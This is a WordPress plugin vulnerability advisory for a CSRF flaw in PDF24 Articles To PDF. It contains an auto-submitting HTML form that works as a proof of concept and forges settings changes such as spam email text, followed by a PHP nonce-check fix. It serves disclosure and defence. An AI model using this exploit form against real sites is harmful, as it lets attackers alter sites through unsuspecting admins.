WordPress Plugin Vulnerabilities
PDF24 Articles To PDF <= 4.2.2 - Arbitrary Settings Update via CSRF
Description
The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
Proof of Concept
<form id="test" action="https://example.com/wp-admin/options-general.php?page=pdf24" method="POST">
  <input type="text" name="language" value="en">
  <input type="text" name="availability" value="public">
  <input type="text" name="contentCompression" value="on">
  <input type="text" name="docOptionsInUse" value="on">
  <input type="text" name="docHeader" value="hacked">
  <input type="text" name="docSize" value="A4">
  <input type="text" name="docOrientation" value="portrait">
  <input type="text" name="docStyle" value="">
  <input type="text" name="docDefaultFilename" value="">
  <input type="text" name="docHomeFilename" value="">
  <input type="text" name="docSingleFilename" value="">
  <input type="text" name="docPageFilename" value="">
  <input type="text" name="docCategoryFilename" value="">
  <input type="text" name="docSearchFilename" value="">
  <input type="text" name="emailOptionsInUse" value="on">
  <input type="text" name="emailType" value="text/plain">
  <input type="text" name="emailSubject" value="hacked">
  <input type="text" name="emailFrom" value="hacked">
  <input type="text" name="emailText" value="please buy my rolex">
  <input type="text" name="cpInUse" value="on">
  <input type="text" name="cpDisplayMode" value="bottom">
  <input type="text" name="cpStyle" value="default_elbf">
  <textarea name="cpCustomStyle">.pdf24Plugin-cp { border:1px solid silver; } .pdf24Plugin-cp input[type="text"] { width:200px; border:1px solid silver; margin:0; padding:2px; } .pdf24Plugin-cp input[type="submit"] { margin:0; padding:2px 10px !important; } .pdf24Plugin-cp form { margin:0; padding:0; } .pdf24Plugin-cp img { height:32px; } .pdf24Plugin-cp span, .pdf24Plugin-cp input, .pdf24Plugin-cp img { vertical-align:middle; } .pdf24Plugin-cp * { font-size:90%; }</textarea>
  <input type="text" name="sbpInUse" value="on">
  <input type="text" name="sbpStyle" value="default_dsbfl">
  <textarea name="sbpCustomStyle">.pdf24Plugin-sbp { text-align:center; border: 1px solid silver; padding: 5px; } .pdf24Plugin-sbp-link a { font-weight:bold; } .pdf24Plugin-sbp-bl { font-size:smaller; }</textarea>
  <input type="text" name="tbpStyle" value="default_dflb">
  <textarea name="tbpCustomStyle">.pdf24Plugin-tbp { padding: 3px; width:600px; margin:auto; } .pdf24Plugin-tbp * { font-size: 90%; }</textarea>
  <input type="text" name="lpStyle" value="default_dfl">
  <textarea name="lpCustomStyle">.pdf24Plugin-lp-link a { }</textarea>
  <input type="text" name="lang-enterEmail" value="Enter email address">
  <input type="text" name="lang-send" value="Send">
  <input type="text" name="lang-sendArticleAsPDF" value="Send article as PDF">
  <input type="text" name="lang-sendArticlesAsPDF" value="Send articles as PDF">
  <input type="text" name="lang-downloadArticleAsPDF" value="Download article as PDF">
  <input type="text" name="lang-downloadArticlesAsPDF" value="Download articles as PDF">
  <input type="text" name="lang-createPDF" value="Create PDF">
  <textarea name="docTpl"><html> <head> <base href="{baseUrl}" /> <title>{headline}</title> <meta http-equiv="content-type" content="text/html; charset={charset}" /> <style type="text/css"> {css} </style> </head> <body> <h1><a href="{headlineUrl}">{headline}</a></h1> <div>{content}</div> </body> </html></textarea>
  <textarea name="docEntryTpl"><div class="bodyPart"> <h2><a href="{url}">{title}</a></h2> <div class="meta">{dateTime} {author}</div> <div class="text">{text}</div> </div></textarea>
  <input type="text" name="update" value="Save Changes">
</form>
<script>
  document.getElementById("test").submit();
</script>
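The check whose absence is described above, sketched as an added example (not the PDF24 plugin's own code and not its actual patch). The function name, nonce action/field names and the `pdf24_demo_` option prefix are assumptions; the `pdf24` page slug and the `docHeader`, `emailSubject`, `emailFrom` and `update` fields are taken from the proof of concept. A settings handler that requires a nonce rejects the auto-submitted cross-site form because the attacker's page cannot supply a valid token.

```php
<?php
// Added example: hypothetical names throughout, WordPress core API calls only.
const PDF24_DEMO_NONCE_ACTION = 'pdf24_demo_save_settings'; // assumed action name
const PDF24_DEMO_NONCE_FIELD  = 'pdf24_demo_nonce';         // assumed field name

add_action('admin_menu', function () {
    // Same page slug as in the proof-of-concept URL (?page=pdf24).
    add_options_page('PDF24', 'PDF24', 'manage_options', 'pdf24', 'pdf24_demo_settings_page');
});

function pdf24_demo_settings_page() {
    // Authorization: only users who may manage options reach the handler.
    if (!current_user_can('manage_options')) {
        wp_die('Insufficient permissions.', '', array('response' => 403));
    }

    if ('POST' === $_SERVER['REQUEST_METHOD'] && isset($_POST['update'])) {
        // CSRF check: aborts with a 403 page unless the POST carries a nonce
        // bound to this action and to the current user's session.
        check_admin_referer(PDF24_DEMO_NONCE_ACTION, PDF24_DEMO_NONCE_FIELD);

        // Allow-list the fields that may be written, and sanitize each value.
        foreach (array('docHeader', 'emailSubject', 'emailFrom') as $key) {
            if (isset($_POST[$key])) {
                update_option(
                    'pdf24_demo_' . $key, // assumed option prefix
                    sanitize_text_field(wp_unslash($_POST[$key]))
                );
            }
        }
        echo '<div class="updated"><p>Settings saved.</p></div>';
    }
    ?>
    <form method="post" action="">
        <?php // Emits the hidden nonce field (and a referer field) into the form.
        wp_nonce_field(PDF24_DEMO_NONCE_ACTION, PDF24_DEMO_NONCE_FIELD); ?>
        <input type="text" name="docHeader"
               value="<?php echo esc_attr(get_option('pdf24_demo_docHeader', '')); ?>">
        <input type="text" name="emailSubject"
               value="<?php echo esc_attr(get_option('pdf24_demo_emailSubject', '')); ?>">
        <input type="text" name="emailFrom"
               value="<?php echo esc_attr(get_option('pdf24_demo_emailFrom', '')); ?>">
        <input type="submit" name="update" value="Save Changes">
    </form>
    <?php
}
```

The capability check alone does not stop this issue, since the forged request runs with the logged-in admin's privileges; the nonce verification is what ties the request to a form the admin actually loaded.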
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-05-30 (about 1 years ago)
Added
2022-05-30 (about 1 years ago)
Last Updated
2023-02-25 (about 1 years ago)